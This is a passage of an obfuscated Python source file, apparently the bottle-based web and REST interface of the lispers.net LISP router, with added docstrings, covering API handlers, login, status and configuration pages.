            return (json.dumps(IIIi1i1I))
    if 26 - 26: Ii1I - o0oOOo0O0Ooo
    if 63 - 63: II111iiii . II111iiii
    if 32 - 32: i1IIi . I11i % OoO0O00 . o0oOOo0O0Ooo
    if 42 - 42: I1Ii111 + I1ii11iIi11i
    if 70 - 70: Oo0Ooo % Oo0Ooo . IiII % OoO0O00 * o0oOOo0O0Ooo % oO0o
    if 23 - 23: i11iIiiIii + I1IiiI
    if 68 - 68: OoOoOO00 . oO0o . i11iIiiIii
    if (command == "data" and data_structure != ""):
        # Data-structure query: optional JSON filter in the request body.
        II = bottle.request.body.readline()
        IIIi1i1I = json.loads(II) if II != "" else ""
        if (IIIi1i1I != ""): IIIi1i1I = IIIi1i1I.values()[0]
        if (IIIi1i1I == []): IIIi1i1I = ""
        if 14 - 14: Oo0Ooo . I1IiiI / Ii1I
        # Unwrap one more nesting level when the filter is a dict of dicts.
        if (type(IIIi1i1I) == dict and type(IIIi1i1I.values()[0]) == dict):
            IIIi1i1I = IIIi1i1I.values()[0]
        if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
        if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
        IIIi1i1I = o0o00ooo0(data_structure, IIIi1i1I)
        return (IIIi1i1I)
    if 96 - 96: O0 % oO0o % iIii1I11I1II1
    if 78 - 78: iIii1I11I1II1 - Ii1I * OoO0O00 + o0oOOo0O0Ooo + iII111i + iII111i
    if 11 - 11: iII111i - OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
    if 74 - 74: iII111i * O0
    if 89 - 89: oO0o + Oo0Ooo
    # Configuration-clause query: name from the URL or the request body.
    if (command != ""):
        command = "lisp " + command
    else:
        II = bottle.request.body.readline()
        if (II == ""):
            IIIi1i1I = [{"?": [{"?": "no-body"}]}]
            return (json.dumps(IIIi1i1I))
        if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
        if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
        IIIi1i1I = json.loads(II)
        command = IIIi1i1I.keys()[0]
    if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
    if 20 - 20: o0oOOo0O0Ooo
    IIIi1i1I = lispconfig.lisp_get_clause_for_api(command)
    return (json.dumps(IIIi1i1I))
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
def o00O():
    """Build the "system" status blob for the REST API.

    Returns a JSON string with hostname, system and LISP uptime, version,
    whether a crash-traceback log exists, and the local RLOC addresses.
    """
    IIIi1i1I = {}
    IIIi1i1I["hostname"] = socket.gethostname()
    IIIi1i1I["system-uptime"] = commands.getoutput("uptime")
    IIIi1i1I["lisp-uptime"] = lisp.lisp_print_elapsed(lisp.lisp_uptime)
    IIIi1i1I["lisp-version"] = lisp.lisp_version
    if 69 - 69: oO0o % I1Ii111 - o0oOOo0O0Ooo + I1Ii111 - O0 % OoooooooOO
    # Report whether a traceback has ever been written by a crash.
    Iii111II = "yes" if os.path.exists("./logs/lisp-traceback.log") else "no"
    IIIi1i1I["traceback-log"] = Iii111II
    if 9 - 9: OoO0O00
    # lisp_myrlocs holds two locator entries (presumably IPv4/IPv6 --
    # confirm in lisp.py); print "none" for any that is unset.
    i11 = lisp.lisp_myrlocs[0]
    O0oo0OO0oOOOo = lisp.lisp_myrlocs[1]
    i11 = "none" if (i11 == None) else i11.print_address_no_iid()
    O0oo0OO0oOOOo = "none" if (O0oo0OO0oOOOo == None) else O0oo0OO0oOOOo.print_address_no_iid()
    IIIi1i1I["lisp-rlocs"] = [i11, O0oo0OO0oOOOo]
    return (json.dumps(IIIi1i1I))
if 35 - 35: IiII % I1IiiI
if 70 - 70: iII111i * I1ii11iIi11i
if 46 - 46: ooOoO0o / OoO0O00
if 52 - 52: o0oOOo0O0Ooo - OoooooooOO + Ii1I + Ii1I - o0oOOo0O0Ooo / I1Ii111
if 44 - 44: ooOoO0o . i1IIi - I1ii11iIi11i . O0 - ooOoO0o
if 92 - 92: iII111i . I11i + o0oOOo0O0Ooo
if 28 - 28: i1IIi * Oo0Ooo - o0oOOo0O0Ooo * IiII * Ii1I / OoO0O00
if 94 - 94: II111iiii % I1ii11iIi11i / OoOoOO00 * iIii1I11I1II1
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
if 70 - 70: Ii1I / I11i . iII111i % Oo0Ooo
if 67 - 67: OoOoOO00 * o0oOOo0O0Ooo . IiII - OoO0O00 * o0oOOo0O0Ooo
if 46 - 46: OOooOOo + OoOoOO00 . I1IiiI * oO0o % IiII
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
def o0o00ooo0(data_structure, data):
    """Fetch a LISP data structure from the owning component over IPC.

    Validates `data_structure` against the supported set, serializes the
    optional `data` filter, forwards an API IPC message to whichever
    component (ITR/RTR/ETR/MS) owns that structure, then blocks on
    lisp_receive() for the reply and returns it (a JSON string).
    Returns json.dumps([]) when the structure is unknown or the owning
    process is not running.

    Fix: corrected the "parmameters" typo in the log message.
    """
    iI1ii1Ii = ["site-cache", "map-cache", "system", "map-resolver",
                "map-server", "database-mapping"]
    if (data_structure not in iI1ii1Ii): return (json.dumps([]))

    # "system" is answered locally, no IPC round-trip needed.
    if (data_structure == "system"): return (o00O())

    # Build the IPC request; filter parameters ride along after a "%".
    if (data != ""): data = json.dumps(data)
    Oo0O00Oo0o0 = lisp.lisp_api_ipc("lisp-core", data_structure + "%" + data)

    # Map-cache/map-resolver live in the RTR when present, else the ITR.
    # The IPC lock is acquired before sending and released after the
    # reply is received below.
    if (data_structure in ["map-cache", "map-resolver"]):
        if (lisp.lisp_is_running("lisp-rtr")):
            lisp.lisp_ipc_lock.acquire()
            lisp.lisp_ipc(Oo0O00Oo0o0, Oo, "lisp-rtr")
        elif (lisp.lisp_is_running("lisp-itr")):
            lisp.lisp_ipc_lock.acquire()
            lisp.lisp_ipc(Oo0O00Oo0o0, Oo, "lisp-itr")
        else:
            return (json.dumps([]))

    # Map-server/database-mapping live in the ETR when present, else the ITR.
    if (data_structure in ["map-server", "database-mapping"]):
        if (lisp.lisp_is_running("lisp-etr")):
            lisp.lisp_ipc_lock.acquire()
            lisp.lisp_ipc(Oo0O00Oo0o0, Oo, "lisp-etr")
        elif (lisp.lisp_is_running("lisp-itr")):
            lisp.lisp_ipc_lock.acquire()
            lisp.lisp_ipc(Oo0O00Oo0o0, Oo, "lisp-itr")
        else:
            return (json.dumps([]))

    # The site cache is owned by the map-server process.
    if (data_structure == "site-cache"):
        if (lisp.lisp_is_running("lisp-ms")):
            lisp.lisp_ipc_lock.acquire()
            lisp.lisp_ipc(Oo0O00Oo0o0, Oo, "lisp-ms")
        else:
            return (json.dumps([]))

    lisp.lprint("Waiting for api get-data '{}', parameters: '{}'".format(data_structure, data))

    # Block until the owning component replies, then release the lock.
    iIii, ooo0O, oOoO0o00OO0, i1I1ii = lisp.lisp_receive(Oo, True)
    lisp.lisp_ipc_lock.release()
    return (i1I1ii)
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
@bottle.route('/lisp/api', method="put")
@bottle.route('/lisp/api/<command>', method="put")
@bottle.route('/lisp/api/<command>', method="delete")
def I1111IIi(command=""):
    """REST PUT/DELETE handler for /lisp/api.

    Authenticates the caller, then adds (PUT) or removes (DELETE) the
    configuration clause supplied as JSON in the request body.  Always
    returns a JSON string.

    Fix: the early no-auth return previously handed the raw Python list
    back to bottle (which cannot serialize a list and would error); it
    now returns json.dumps(...) like every other error path.
    """
    # Default error payload returned on any authentication failure.
    IIIi1i1I = [{"?": [{"?": "not-auth"}]}]
    # PUT/DELETE require basic-auth credentials; reject outright otherwise.
    if (bottle.request.auth == None): return (json.dumps(IIIi1i1I))

    if (bottle.request.auth != None):
        i1iIIi1, ii11iIi1I = bottle.request.auth
        if (lispconfig.lisp_find_user_account(i1iIIi1, ii11iIi1I) == False):
            return (json.dumps(IIIi1i1I))
    else:
        # Unreachable given the early return above; kept for parity with
        # the GET handler's auth structure.
        if (bottle.request.headers["User-Agent"].find("python") != -1):
            return (json.dumps(IIIi1i1I))

    if (lispconfig.lisp_validate_user() == False):
        return (json.dumps(IIIi1i1I))

    # Only superusers may modify user accounts.
    if (command == "user-account"):
        if (lispconfig.lisp_is_user_superuser(i1iIIi1) == False):
            IIIi1i1I = [{"user-account": [{"?": "not-auth"}]}]
            return (json.dumps(IIIi1i1I))

    # The clause to add/remove must be supplied as a JSON body.
    II = bottle.request.body.readline()
    if (II == ""):
        IIIi1i1I = [{"?": [{"?": "no-body"}]}]
        return (json.dumps(IIIi1i1I))

    IIIi1i1I = json.loads(II)
    if (command != ""):
        command = "lisp " + command
    else:
        # Python 2: dict.keys() is a list, so [0] is the clause name.
        command = IIIi1i1I[0].keys()[0]

    # Serialize config changes against concurrent API/IPC activity.
    lisp.lisp_ipc_lock.acquire()
    if (bottle.request.method == "DELETE"):
        IIIi1i1I = lispconfig.lisp_remove_clause_for_api(IIIi1i1I)
    else:
        IIIi1i1I = lispconfig.lisp_put_clause_for_api(IIIi1i1I)
    lisp.lisp_ipc_lock.release()
    return (json.dumps(IIIi1i1I))
if 77 - 77: iIii1I11I1II1 * OoO0O00
if 95 - 95: I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
@bottle.route('/lisp/show/api-doc', method="get")
def oooO0():
    """Regenerate lispapi.txt with pydoc (when sources exist) and serve it."""
    if os.path.exists("lispapi.py"):
        os.system("pydoc lispapi > lispapi.txt")
    if not os.path.exists("lispapi.txt"):
        return "lispapi.txt file not found"
    return bottle.static_file("lispapi.txt", root="./")
if 60 - 60: o0oOOo0O0Ooo
if 25 - 25: OoO0O00
if 62 - 62: OOooOOo + O0
if 98 - 98: o0oOOo0O0Ooo
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
@bottle.route('/lisp/show/command-doc', method="get")
def OoO0o():
    """Serve the example configuration file as plain text documentation."""
    example = "lisp.config.example"
    return bottle.static_file(example, root="./", mimetype="text/plain")
if 78 - 78: oO0o % O0 % Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
@bottle.route('/lisp/show/lisp-xtr', method="get")
def o0oOO000oO0oo():
    """Render the xTR "show" output file as HTML.

    Reads ./show-ztr if present, else ./show-xtr, converts leading
    indentation to HTML spacing and newlines to <br>, then returns the
    font-converted page.
    """
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    if (os.path.exists("./show-ztr")):
        Oo0O0oooo = open("./show-ztr", "r"); I111iI = Oo0O0oooo.read(); Oo0O0oooo.close()
    else:
        Oo0O0oooo = open("./show-xtr", "r"); I111iI = Oo0O0oooo.read(); Oo0O0oooo.close()

    OoO0OOOOo0O = ""
    I111iI = I111iI.split("\n")
    for OooOO in I111iI:
        # NOTE(review): a 4-space-indented line matches BOTH prefixes, so
        # it receives lisp_space(4) and lisp_space(2) -- preserved as-is.
        if (OooOO[0:4] == "    "): OoO0OOOOo0O += lisp.lisp_space(4)
        if (OooOO[0:2] == "  "): OoO0OOOOo0O += lisp.lisp_space(2)
        OoO0OOOOo0O += OooOO + "<br>"

    OoO0OOOOo0O = lisp.convert_font(OoO0OOOOo0O)
    return (lisp.lisp_print_sans(OoO0OOOOo0O))
if 57 - 57: II111iiii + i1IIi
if 10 - 10: oO0o + i1IIi
if 87 - 87: I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
@bottle.route('/lisp/show/<xtr>/keys', method="get")
def iiIiI1i1(xtr):
    """Show security keys for an ITR/ETR/RTR; superuser only."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    I11iII = lispconfig.lisp_is_user_superuser(None)

    if (I11iII == False):
        i1I1ii = "Permission denied"
        return (lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(i1I1ii)))

    # Only these component names are valid in the URL.
    if (xtr not in ["itr", "etr", "rtr"]):
        i1I1ii = "Invalid URL"
        return (lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(i1I1ii)))

    # Forward e.g. "show itr-keys" to the component over IPC.
    OOoOO0o0o0 = "show {}-keys".format(xtr)
    return (lispconfig.lisp_process_show_command(Oo, OOoOO0o0o0))
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
@bottle.route('/lisp/geo-map/<geo_prefix>')
def IIo0Oo0oO0oOO00(geo_prefix):
    """Render a geo-prefix on the bundled map page.

    Converts the URL's dash-separated geo string into the "coords/radius"
    form, computes decimal lat/lon, and substitutes $LAT/$LON/$RADIUS
    into lispers.net-geo.html.
    """
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    # URL uses "-" before the radius; the parser expects "coords/radius".
    geo_prefix = geo_prefix.split("-")
    geo_prefix = "-".join(geo_prefix[0:-1]) + "/" + geo_prefix[-1]
    I1i = lisp.lisp_geo("")
    I1i.parse_geo_string(geo_prefix)
    O00Oooo, i11I = I1i.dms_to_decimal()
    # Radius is stored in km; the map template wants meters.
    o00Oo0oooooo = I1i.radius * 1000

    o0o = open("./lispers.net-geo.html", "r"); oo0 = o0o.read(); o0o.close()
    oo0 = oo0.replace("$LAT", str(O00Oooo))
    oo0 = oo0.replace("$LON", str(i11I))
    oo0 = oo0.replace("$RADIUS", str(o00Oo0oooooo))
    return (oo0)
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
@bottle.route('/lisp/login', method="get")
def oOO00O():
    """Return the HTML login page."""
    return lispconfig.lisp_login_page()
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
if 31 - 31: OOooOOo
@bottle.route('/lisp/login', method="post")
def i1():
    """Handle a login form post: landing page on success, login page otherwise."""
    if lispconfig.lisp_validate_user():
        return lispconfig.lisp_landing_page()
    return oOO00O()
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
@bottle.route('/lisp')
def II1i11I():
    """Root /lisp page: landing page for validated users, else the login page."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()
    return lispconfig.lisp_landing_page()
if 49 - 49: oO0o - i11iIiiIii . I1Ii111 * Ii1I % iII111i + i1IIi
if 71 - 71: o0oOOo0O0Ooo
if 38 - 38: oO0o % OoOoOO00 + I1ii11iIi11i . i11iIiiIii
if 53 - 53: i11iIiiIii * iII111i
if 68 - 68: iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / II111iiii % Oo0Ooo
if 38 - 38: ooOoO0o - OOooOOo / iII111i
if 66 - 66: O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / Ii1I + I1ii11iIi11i
@bottle.route('/lisp/traceback')
def ooo00Ooo():
    """Show crash tracebacks, if any, as an HTML page.

    Prefers ./logs/lisp-traceback.log; otherwise greps all component logs
    for "Traceback" and lists the files that contain one.
    """
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    # Tracks whether we still have nothing to show.
    o0O0oo0OO0O = True

    if (os.path.exists("./logs/lisp-traceback.log")):
        i1I1ii = commands.getoutput("cat ./logs/lisp-traceback.log")
        if (i1I1ii):
            i1I1ii = i1I1ii.replace("----------", "<b>----------</b>")
            i1I1ii = i1I1ii.replace("\n", "<br>")
            o0O0oo0OO0O = False

    if (o0O0oo0OO0O):
        # No dedicated traceback log; grep every component log instead.
        i1I1ii = ""
        IIiI1Ii = "egrep --with-filename Traceback ./logs/*.log"
        O0O0O0Oo = commands.getoutput(IIiI1Ii)
        O0O0O0Oo = O0O0O0Oo.split("\n")
        for OOOOoO00o0O in O0O0O0Oo:
            if (OOOOoO00o0O.find(":") == -1): continue
            OooOO = OOOOoO00o0O.split(":")
            if (OooOO[1] == "0"): continue
            i1I1ii += "Found Tracebacks in log file {}<br>".format(OooOO[0])
            o0O0oo0OO0O = False
        # Strip the trailing "<br>" from the last line.
        i1I1ii = i1I1ii[0:-4]

    if (o0O0oo0OO0O):
        i1I1ii = "No Tracebacks found - a stable system is a happy system"

    i1I1ii = lisp.lisp_print_cour(i1I1ii)
    return (lispconfig.lisp_show_wrapper(i1I1ii))
if 95 - 95: I1IiiI
if 46 - 46: OoOoOO00 + OoO0O00
if 70 - 70: iII111i / iIii1I11I1II1
if 85 - 85: OoooooooOO % i1IIi * OoooooooOO / I1ii11iIi11i
if 96 - 96: OoooooooOO + oO0o
if 44 - 44: oO0o
if 20 - 20: I11i + Ii1I / O0 % iIii1I11I1II1
@bottle.route('/lisp/show/not-supported')
def oOo0O():
    """Show the "not supported" page for features absent in this build."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()
    return lispconfig.lisp_not_supported()
if 30 - 30: iIii1I11I1II1 . I1IiiI . OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
@bottle.route('/lisp/show/status')
def IIii11I1i1I():
    """Render the 'show status' page: version/uptime, admin buttons for
    superusers, the LISP process list, system resource usage (per-OS
    'top' output), and the release notes."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())
    if 99 - 99: iII111i
    if 76 - 76: OoO0O00 * I1IiiI
    if 82 - 82: Ii1I * iII111i / I1ii11iIi11i
    if 36 - 36: OoooooooOO - i1IIi . O0 / II111iiii + o0oOOo0O0Ooo
    if 33 - 33: II111iiii / ooOoO0o * O0 % Ii1I * I1Ii111
    i1I1ii = ""
    # Only superusers get the row of administrative action buttons.
    I11iII = lispconfig.lisp_is_user_superuser(None)
    if (I11iII):
        O0o = lisp.lisp_button("show configuration", "/lisp/show/conf")
        O0OOoOOO0oO = lisp.lisp_button("show configuration diff", "/lisp/show/diff")
        I1ii11 = lisp.lisp_button("archive configuration", "/lisp/archive/conf")
        oOoOoOoo0 = lisp.lisp_button("clear configuration", "/lisp/clear/conf/verify")
        OOOOoO00o0O = lisp.lisp_button("log flows", "/lisp/log/flows")
        III1ii1I = lisp.lisp_button("install LISP software", "/lisp/install/image")
        Ii1i1iI = lisp.lisp_button("restart LISP subsystem", "/lisp/restart/verify")
        if 16 - 16: OOooOOo / Oo0Ooo / OoooooooOO * I1IiiI + i1IIi % OOooOOo
        i1I1ii = "<center>{}{}{}{}{}{}{}</center><hr>".format(O0o, O0OOoOOO0oO, I1ii11, oOoOoOoo0,
            OOOOoO00o0O, III1ii1I, Ii1i1iI)
    if 71 - 71: OoOoOO00
    if 14 - 14: i11iIiiIii % OOooOOo
    OooO0oo = commands.getoutput("uptime")         # system uptime line
    o0o0oOoOO0O = commands.getoutput("uname -pv")  # arch + kernel version
    i1ii1II1ii = lisp.lisp_version.replace("+", "")
    if 28 - 28: I1ii11iIi11i
    if 61 - 61: OOooOOo % OOooOOo * o0oOOo0O0Ooo / o0oOOo0O0Ooo
    if 75 - 75: IiII . ooOoO0o
    if 50 - 50: OoOoOO00
    if 60 - 60: ooOoO0o * iIii1I11I1II1 * I1ii11iIi11i * Oo0Ooo
    O0ooooo0OOOO0 = multiprocessing.cpu_count()
    if 9 - 9: II111iiii - o0oOOo0O0Ooo / iII111i / o0oOOo0O0Ooo
    # Strip the trailing ", load average ..." portion from the uptime line.
    I1i111iiIIIi = OooO0oo.find(", load")
    OooO0oo = OooO0oo[0:I1i111iiIIIi]
    O00 = lisp.lisp_print_elapsed(lisp.lisp_uptime)
    if 17 - 17: Ii1I - OoooooooOO % Ii1I . IiII / i11iIiiIii % iII111i
    # Resource-utilization text; replaced below by per-OS 'top' output.
    iIiIIIIIii = "Not available"
    if 58 - 58: o0oOOo0O0Ooo / IiII . OoOoOO00 / OoooooooOO + I1Ii111
    if 86 - 86: I11i * I1IiiI + I11i + II111iiii
    if 8 - 8: I1Ii111 - iII111i / ooOoO0o
    if 96 - 96: OoOoOO00
    # macOS ps needs "auww" so the command column is not truncated.
    OOoOO0o0o0 = "ps auww" if lisp.lisp_is_macos() else "ps aux"
    IIiiI = commands.getoutput("{} | egrep 'PID|python lisp|python -O lisp' | egrep -v grep".format(OOoOO0o0o0))
    if 31 - 31: I1ii11iIi11i + Ii1I + I1Ii111 / Ii1I
    if 25 - 25: OoO0O00
    # Preserve column alignment in HTML with hard spaces and <br> newlines.
    IIiiI = IIiiI.replace(" ", lisp.space(1))
    IIiiI = IIiiI.replace("\n", "<br>")
    if 24 - 24: IiII * i11iIiiIii * OOooOOo
    if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
    if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
    if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
    if (o0o0oOoOO0O.find("Darwin") != -1):
        # macOS: one-shot "top -l 1" snapshot.  Halving cpu_count()
        # presumably converts hyperthreads to physical cores -- TODO confirm.
        O0ooooo0OOOO0 = O0ooooo0OOOO0 / 2
        iIiIIIIIii = commands.getoutput("top -l 1 | head -50")
        iIiIIIIIii = iIiIIIIIii.split("PID")
        iIiIIIIIii = iIiIIIIIii[0]
        if 74 - 74: O0 / i1IIi
        if 78 - 78: OoooooooOO . OoO0O00 + ooOoO0o - i1IIi
        if 31 - 31: OoooooooOO . OOooOOo
        if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
        if 100 - 100: OoO0O00
        # Insert a <br> before each 'top' header section so the summary
        # wraps readably when rendered as HTML.
        I1i111iiIIIi = iIiIIIIIii.find("Load Avg")
        II1i = iIiIIIIIii[0:I1i111iiIIIi].find("threads")
        Ii1IIIIi1ii1I = iIiIIIIIii[0:II1i + 7]
        iIiIIIIIii = Ii1IIIIi1ii1I + "<br>" + iIiIIIIIii[I1i111iiIIIi::]
        I1i111iiIIIi = iIiIIIIIii.find("CPU usage")
        iIiIIIIIii = iIiIIIIIii[0:I1i111iiIIIi] + "<br>" + iIiIIIIIii[I1i111iiIIIi::]
        I1i111iiIIIi = iIiIIIIIii.find("SharedLibs:")
        iIiIIIIIii = iIiIIIIIii[0:I1i111iiIIIi] + "<br>" + iIiIIIIIii[I1i111iiIIIi::]
        I1i111iiIIIi = iIiIIIIIii.find("MemRegions")
        iIiIIIIIii = iIiIIIIIii[0:I1i111iiIIIi] + "<br>" + iIiIIIIIii[I1i111iiIIIi::]
        I1i111iiIIIi = iIiIIIIIii.find("PhysMem")
        iIiIIIIIii = iIiIIIIIii[0:I1i111iiIIIi] + "<br>" + iIiIIIIIii[I1i111iiIIIi::]
        I1i111iiIIIi = iIiIIIIIii.find("VM:")
        iIiIIIIIii = iIiIIIIIii[0:I1i111iiIIIi] + "<br>" + iIiIIIIIii[I1i111iiIIIi::]
        I1i111iiIIIi = iIiIIIIIii.find("Networks")
        iIiIIIIIii = iIiIIIIIii[0:I1i111iiIIIi] + "<br>" + iIiIIIIIii[I1i111iiIIIi::]
        I1i111iiIIIi = iIiIIIIIii.find("Disks")
        iIiIIIIIii = iIiIIIIIii[0:I1i111iiIIIi] + "<br>" + iIiIIIIIii[I1i111iiIIIi::]
    else:
        if 13 - 13: I1IiiI % OoOoOO00 . I1ii11iIi11i / Oo0Ooo % OOooOOo . OoooooooOO
        if 22 - 22: IiII / i11iIiiIii
        if 62 - 62: OoO0O00 / I1ii11iIi11i
        if 7 - 7: OoooooooOO . IiII
        # Linux: batch-mode 'top'; pad only the process table (after "PID")
        # with hard spaces so its columns survive HTML rendering.
        I111iI = commands.getoutput("top -b -n 1 | head -50")
        I111iI = I111iI.split("PID")
        I111iI[1] = I111iI[1].replace(" ", lisp.space(1))
        I111iI = I111iI[0] + I111iI[1]
        iIiIIIIIii = I111iI.replace("\n", "<br>")
    if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
    if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
    O00oOo00o0o = commands.getoutput("cat release-notes.txt")
    O00oOo00o0o = O00oOo00o0o.replace("\n", "<br>")
    if 85 - 85: iII111i + OoooooooOO * iII111i - I1Ii111 % i11iIiiIii
    # NOTE(review): Oo0o is a module-level value defined outside this chunk
    # (appears to be the build-date string) -- confirm.
    i1I1ii += '''
<br><table align="center" border="1" cellspacing="3x" cellpadding="5x">
<tr>
<td width="20%"><i>LISP Subsystem Version:<br>
LISP Release {} Build Date:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>LISP Subsystem Uptime:<br>System Uptime:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>System Architecture:<br>
Number of CPUs:<font face="Courier New">{}{}</font></td>
<td width="80%"><font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>LISP Process Status:</i></td>
<td width="80%">
<div style="height: 100px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
<tr>
<td width="20%" valign="top"><i>System Resource Utilization:</i></td>
<td width="80%">
<div style="height: 200px; overflow: auto">
<font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>Release Notes:</i></td>
<td width="80%">
<div style="height: 300px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
</table>
'''.format(i1ii1II1ii, lisp.lisp_version, Oo0o, O00,
        OooO0oo, lisp.lisp_space(1), O0ooooo0OOOO0, o0o0oOoOO0O, IIiiI, iIiIIIIIii,
        O00oOo00o0o)
    if 71 - 71: I1ii11iIi11i - ooOoO0o / OoOoOO00 * OoOoOO00 / i1IIi . i1IIi
    return (lispconfig.lisp_show_wrapper(i1I1ii))
if 53 - 53: I1Ii111
if 21 - 21: I11i
if 92 - 92: i11iIiiIii / I1Ii111 - iII111i % ooOoO0o * I1Ii111 + Oo0Ooo
if 11 - 11: OoooooooOO . I1Ii111
if 80 - 80: OoooooooOO - OOooOOo * Ii1I * I1ii11iIi11i / I1IiiI / OOooOOo
if 13 - 13: I1Ii111 * ooOoO0o + i11iIiiIii * I1Ii111 - ooOoO0o
if 23 - 23: iIii1I11I1II1 * i1IIi % OoooooooOO * IiII
@bottle.route('/lisp/show/conf')
def I1Iiiiiii():
    """Serve the running lisp.config file as plain text."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())
    return bottle.static_file("lisp.config", root="./", mimetype="text/plain")
if 69 - 69: O0
